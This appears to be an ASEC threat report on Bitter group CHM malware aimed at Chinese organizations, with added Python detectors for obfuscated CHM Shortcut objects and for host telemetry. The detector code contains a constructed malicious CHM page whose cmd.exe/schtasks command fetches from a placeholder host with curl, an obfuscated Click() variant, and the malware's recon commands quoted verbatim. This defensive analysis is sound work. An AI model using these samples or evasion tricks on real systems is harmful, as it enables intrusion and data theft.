The Bitter (T-APT-17) group is a threat group that usually targets South Asian government organizations and distributes its malware through Microsoft Office documents such as Word or Excel files. AhnLab Security Emergency response Center (ASEC) has identified multiple cases of the group distributing CHM malware to certain Chinese organizations. CHM files have been used by various threat groups in APT attacks since earlier this year and have been covered multiple times in ASEC blog posts.
The files used in the recent attacks were distributed as compressed email attachments. Each archive contains a CHM file with one of the following filenames.
- Filenames used in distribution
Project Plan 2023 .chm
Urgent passport enquiry of the following officials.docx.chm
SUSPECTED FOREIGN TERRORIST FIGHTERS.chm
Forensic Evidence on Crime Scene.chm
When the CHM files are executed, most open an empty help window, but some display content related to the “United Front Work Department of the Central Committee of the Chinese Communist Party” and the “Russian-Chinese Committee for Friendship, Peace and Development.”
The malicious script embedded in these CHM files is as follows. A user has little chance of noticing how it operates. The common characteristic of the script is that the part which calls the Click method, the call that executes the linked shortcut object, is obfuscated. Unlike the CHM files covered in the past, this version appears designed to evade static detection through that obfuscation.
When the script runs, both variants create a scheduled task that executes a malicious command. Each command connects to its respective URL listed below and executes an additional malicious file. Both URLs are currently unavailable, but an MSI file presumed to have been downloaded from the first URL has been collected.
When executed, the MSI file drops a legitimate exe file and a malicious DLL file, then runs the exe. The generated files are shown below. When MicrosoftServices.exe is executed, it loads OLMAPI32.dll, and that DLL is the malicious file created by the threat actor: a legitimate executable is used to load a malicious library of the name it expects, the DLL side-loading technique (T1574.002).
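The obfuscation described above only hides the literal `.Click(` from a signature; the shortcut object and the command it carries are still in the HTML inside the CHM. The following Python script is an added example, not ASEC's tooling or the actual Bitter script. It scans the HTML extracted from a CHM (for instance with `7z x file.chm` or `hh.exe -decompile`) for the HTML Help Shortcut ActiveX object, pulls out the command in its Item1 parameter, and compares a naive `.Click(` signature with a check that first undoes the cheap JavaScript obfuscations (string concatenation and `String.fromCharCode`). The sample pages, object id, command and URL are constructed for the example.

```python
import re

# CLSID of the HTML Help "Shortcut" ActiveX control; CHM scripts run a command by
# calling .Click() on such an object (the technique described in the post).
SHORTCUT_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

OBJECT_RE = re.compile(r"<OBJECT\b([^>]*)>(.*?)</OBJECT>", re.I | re.S)
PARAM_RE = re.compile(r"""<PARAM\s+name\s*=\s*["']?(\w+)["']?\s+value\s*=\s*(["'])(.*?)\2""", re.I | re.S)
SCRIPT_RE = re.compile(r"<SCRIPT\b[^>]*>(.*?)</SCRIPT>", re.I | re.S)
ID_RE = re.compile(r"""\bid\s*=\s*["']?([\w-]+)""", re.I)
# What a naive static signature looks for: a literal ".Click(" in the script.
NAIVE_CLICK_RE = re.compile(r"\b(\w+)\.Click\s*\(")
# After normalisation both obj.Click() and obj["Click"]() are matched.
CLICK_CALL_RE = re.compile(r"""\b(\w+)\s*(?:\.Click|\[\s*["']Click["']\s*\])\s*\(""")
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
CONCAT_RE = re.compile(r"""(["'])([^"'\\]*)\1\s*\+\s*(["'])([^"'\\]*)\3""")

# Constructed samples (not the actual Bitter script). Item1 is "<window>,<program>,<arguments>";
# the object id, the schtasks command and the URL are placeholders.
PLAIN_CHM_HTML = """<html><body>
<OBJECT id="sc" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Item1" value=',cmd.exe,/c schtasks /create /tn Update /sc minute /tr "curl http://example.invalid/x"'>
</OBJECT>
<SCRIPT>sc.Click();</SCRIPT>
</body></html>"""

# Same behaviour, but the method name is never written out as ".Click".
OBFUSCATED_CHM_HTML = PLAIN_CHM_HTML.replace(
    "<SCRIPT>sc.Click();</SCRIPT>",
    '<SCRIPT>sc[String.fromCharCode(67,108,105,99,107)]();\nsc["Cl" + "ick"]();</SCRIPT>')

BENIGN_HTML = "<html><body><p>Help topic</p><SCRIPT>document.title = 'x';</SCRIPT></body></html>"


def find_shortcut_objects(page):
    """Return [(object id, Item1 command)] for every Shortcut ActiveX object with Command=ShortCut."""
    found = []
    for attrs, body in OBJECT_RE.findall(page):
        if SHORTCUT_CLSID not in attrs.lower():
            continue
        m = ID_RE.search(attrs)
        obj_id = m.group(1) if m else ""
        params = {name.lower(): value for name, _quote, value in PARAM_RE.findall(body)}
        if params.get("command", "").lower() == "shortcut":
            found.append((obj_id, params.get("item1", "")))
    return found


def normalize_script(script):
    """Undo String.fromCharCode(...) and "a" + "b" literal concatenation so method names reappear."""
    def decode(m):
        codes = [int(c) for c in m.group(1).replace(" ", "").split(",") if c]
        return '"' + "".join(chr(c) for c in codes) + '"'
    script = FROMCHARCODE_RE.sub(decode, script)
    prev = None
    while prev != script:  # repeat until no adjacent literal pair is left
        prev = script
        script = CONCAT_RE.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', script)
    return script


def naive_click_hits(page):
    """Objects whose .Click( call is written out literally (what the obfuscation defeats)."""
    return sorted({m.group(1) for s in SCRIPT_RE.findall(page) for m in NAIVE_CLICK_RE.finditer(s)})


def analyze(page):
    """Static verdict: malicious if a ShortCut object is Click()ed after de-obfuscation,
    suspicious if a ShortCut object and the word Click both appear, clean otherwise."""
    objects = find_shortcut_objects(page)
    ids = {obj_id for obj_id, _ in objects}
    scripts = [normalize_script(s) for s in SCRIPT_RE.findall(page)]
    clicked = sorted({m.group(1) for s in scripts for m in CLICK_CALL_RE.finditer(s) if m.group(1) in ids})
    if clicked:
        verdict = "malicious"
    elif objects and any("click" in s.lower() for s in scripts):
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "clicked": clicked, "commands": [cmd for _, cmd in objects]}


if __name__ == "__main__":
    for name, page in (("plain", PLAIN_CHM_HTML), ("obfuscated", OBFUSCATED_CHM_HTML), ("benign", BENIGN_HTML)):
        print(name, "naive:", naive_click_hits(page), "analysis:", analyze(page))
```

The point of the comparison is that the naive signature fires on the plain sample and misses the obfuscated one, while the presence of a ShortCut object carrying a `cmd.exe` command is the durable indicator; the `suspicious` tier catches obfuscations this small normaliser does not unwind (for example a method name assembled in a variable), which a practitioner should then review by hand.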
The loaded malicious DLL behaves as follows. First, it collects user information with the following commands and appends the output to “c:\Users\Public\cr.dat”.
- IP Info
cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com>> c:\Users\Public\cr.dat
- System Info
cmd.exe /c systeminfo>> c:\Users\Public\cr.dat
- Directory Info
cmd.exe /c dir "%userprofile%\Documents">> c:\Users\Public\cr.dat
cmd.exe /c dir "%userprofile%\Desktop">> c:\Users\Public\cr.dat
cmd.exe /c dir "%userprofile%\Downloads">> c:\Users\Public\cr.dat
Afterward, for persistence, a scheduled task named “Microsoft Update” is created that executes MicrosoftServices.exe.
It then attempts to connect to the following C2 server and can perform various malicious actions according to commands from the threat actor.
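The behaviour described from the MSI onward (recon commands appended to cr.dat, OLMAPI32.dll side-loaded by MicrosoftServices.exe, and a “Microsoft Update” task for persistence) is easy to express as host telemetry rules. The Python below is an added example and not ASEC's detection content. It runs three rules over constructed events shaped like Sysmon event 1 (process create), Sysmon event 7 (image load) and Security event 4698 (scheduled task created); the drop directory, host names and timestamps are invented, and the side-load rule assumes that a genuine OLMAPI32.dll, an Outlook component, is loaded from the Office install directory. The post does not say how the task is created, so the persistence rule keys on the task-created event rather than on a schtasks command line.

```python
from collections import defaultdict

COLLECT_FILE = r"c:\users\public\cr.dat"      # staging file named in the report
RECON = {"ipinfo": "nslookup myip.opendns.com", "sysinfo": "systeminfo", "dirlist": "dir "}
TASK_NAME = "microsoft update"                 # persistence task name from the report
SIDELOADED_DLL = "olmapi32.dll"
# Assumption: a genuine OLMAPI32.dll is loaded from the Office install directory.
OFFICE_DIRS = (r"c:\program files\microsoft office", r"c:\program files (x86)\microsoft office")
DROP_DIR = r"C:\ProgramData\MSvc"              # constructed drop directory; the real paths are not reproduced


def pc(host, ts, cmdline):
    """Build a constructed process-create event for cmd.exe."""
    return {"host": host, "ts": ts, "event": "process_create",
            "image": r"C:\Windows\System32\cmd.exe", "cmdline": cmdline}


# Constructed events: the infection chain on ws1, benign look-alikes on ws2.
SAMPLE_EVENTS = [
    pc("ws1", 100, r"cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com>> c:\Users\Public\cr.dat"),
    pc("ws1", 110, r"cmd.exe /c systeminfo>> c:\Users\Public\cr.dat"),
    pc("ws1", 120, r'cmd.exe /c dir "%userprofile%\Documents">> c:\Users\Public\cr.dat'),
    pc("ws1", 130, r'cmd.exe /c dir "%userprofile%\Desktop">> c:\Users\Public\cr.dat'),
    pc("ws1", 140, r'cmd.exe /c dir "%userprofile%\Downloads">> c:\Users\Public\cr.dat'),
    {"host": "ws1", "ts": 90, "event": "image_load",
     "image": DROP_DIR + r"\MicrosoftServices.exe", "loaded": DROP_DIR + r"\OLMAPI32.dll"},
    {"host": "ws1", "ts": 150, "event": "task_create",
     "task_name": r"\Microsoft Update", "action": DROP_DIR + r"\MicrosoftServices.exe"},
    pc("ws2", 200, r"cmd.exe /c systeminfo > C:\temp\inventory.txt"),
    {"host": "ws2", "ts": 210, "event": "image_load",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "loaded": r"C:\Program Files\Microsoft Office\root\Office16\OLMAPI32.dll"},
    {"host": "ws2", "ts": 220, "event": "task_create",
     "task_name": r"\Microsoft\Windows\WindowsUpdate\Scheduled Start",
     "action": r"C:\Windows\System32\sc.exe start wuauserv"},
]


def detect_recon_collection(events, window_s=300):
    """Two or more distinct recon commands appending to cr.dat on one host within window_s seconds."""
    by_host = defaultdict(list)
    for e in events:
        if e["event"] != "process_create":
            continue
        cl = e["cmdline"].lower()
        if COLLECT_FILE in cl and ">>" in cl and any(pat in cl for pat in RECON.values()):
            by_host[e["host"]].append(e)
    findings = []
    for host, hits in by_host.items():
        hits.sort(key=lambda e: e["ts"])
        kinds = {next(k for k, pat in RECON.items() if pat in e["cmdline"].lower()) for e in hits}
        if len(kinds) >= 2 and hits[-1]["ts"] - hits[0]["ts"] <= window_s:
            findings.append({"rule": "recon_to_cr.dat", "host": host, "count": len(hits), "kinds": sorted(kinds)})
    return findings


def detect_sideload(events):
    """OLMAPI32.dll loaded from the loading exe's own directory, outside the Office install (heuristic)."""
    findings = []
    for e in events:
        if e["event"] != "image_load" or not e["loaded"].lower().endswith("\\" + SIDELOADED_DLL):
            continue
        dll_dir = e["loaded"].lower().rsplit("\\", 1)[0]
        exe_dir = e["image"].lower().rsplit("\\", 1)[0]
        if dll_dir == exe_dir and not dll_dir.startswith(OFFICE_DIRS):
            findings.append({"rule": "olmapi32_sideload", "host": e["host"], "image": e["image"], "dll": e["loaded"]})
    return findings


def detect_persistence_task(events):
    """A root-level scheduled task named 'Microsoft Update' (report the action for triage)."""
    return [{"rule": "task_microsoft_update", "host": e["host"], "action": e["action"]}
            for e in events if e["event"] == "task_create"
            and e["task_name"].strip("\\").lower() == TASK_NAME]


def run_all(events):
    return detect_recon_collection(events) + detect_sideload(events) + detect_persistence_task(events)


if __name__ == "__main__":
    for f in run_all(SAMPLE_EVENTS):
        print(f)
```

The recon rule deliberately requires at least two distinct command types inside a time window, since a lone `systeminfo` or `nslookup myip.opendns.com` is routine administration; the side-load rule is the piece most worth keeping generic, because the same exe-beside-DLL-outside-its-normal-home pattern applies to every DLL side-loading case, not only OLMAPI32.dll.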
Attacks using CHM files have recently been increasing both in Korea and overseas, and the format is being used to deliver various malware. Users must carefully check the senders of emails and refrain from opening files from unknown sources. They should also run routine PC checks and always keep their security products updated to the latest version.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.